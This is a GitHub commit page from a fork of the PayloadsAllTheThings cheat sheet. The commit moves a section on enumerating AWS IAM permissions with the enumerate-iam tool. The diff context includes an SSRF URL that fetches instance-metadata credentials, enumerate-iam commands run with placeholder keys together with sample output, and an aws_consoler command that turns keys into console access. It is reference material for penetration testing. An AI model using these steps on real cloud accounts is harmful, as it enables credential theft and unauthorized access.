forked from swisskyrepo/PayloadsAllTheThings
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Fix AWS duplicated tool enumerate-iam
- Loading branch information
Showing
3 changed files
with
26 additions
and
36 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -155,34 +155,6 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance | |
|
||
For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/ | ||
|
||
|
||
## Enumerate IAM permissions | ||
|
||
Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam) | ||
|
||
```powershell | ||
git clone [email protected]:andresriancho/enumerate-iam.git | ||
cd enumerate-iam/ | ||
pip install -r requirements.txt | ||
./enumerate-iam.py --access-key AKIA... --secret-key StF0q... | ||
2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..." | ||
2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked! | ||
2019-05-10 15:58:01,537 - 21345 - [INFO] -- { | ||
"RoleDetailList": [ | ||
{ | ||
"Tags": [], | ||
"AssumeRolePolicyDocument": { | ||
"Version": "2008-10-17", | ||
"Statement": [ | ||
{ | ||
... | ||
2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked! | ||
2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked! | ||
2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked! | ||
2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked! | ||
2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked! | ||
``` | ||
|
||
## References | ||
|
||
* [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets) | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -417,6 +417,32 @@ $> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED] | |
https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED | ||
``` | ||
|
||
## AWS - Enumerate IAM permissions | ||
|
||
Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam) | ||
|
||
```powershell | ||
git clone [email protected]:andresriancho/enumerate-iam.git | ||
pip install -r requirements.txt | ||
./enumerate-iam.py --access-key AKIA... --secret-key StF0q... | ||
2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..." | ||
2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked! | ||
2019-05-10 15:58:01,537 - 21345 - [INFO] -- { | ||
"RoleDetailList": [ | ||
{ | ||
"Tags": [], | ||
"AssumeRolePolicyDocument": { | ||
"Version": "2008-10-17", | ||
"Statement": [ | ||
{ | ||
... | ||
2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked! | ||
2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked! | ||
2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked! | ||
2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked! | ||
2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked! | ||
``` | ||
|
||
## AWS - Mount EBS volume to EC2 Linux | ||
|
||
:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. | ||
|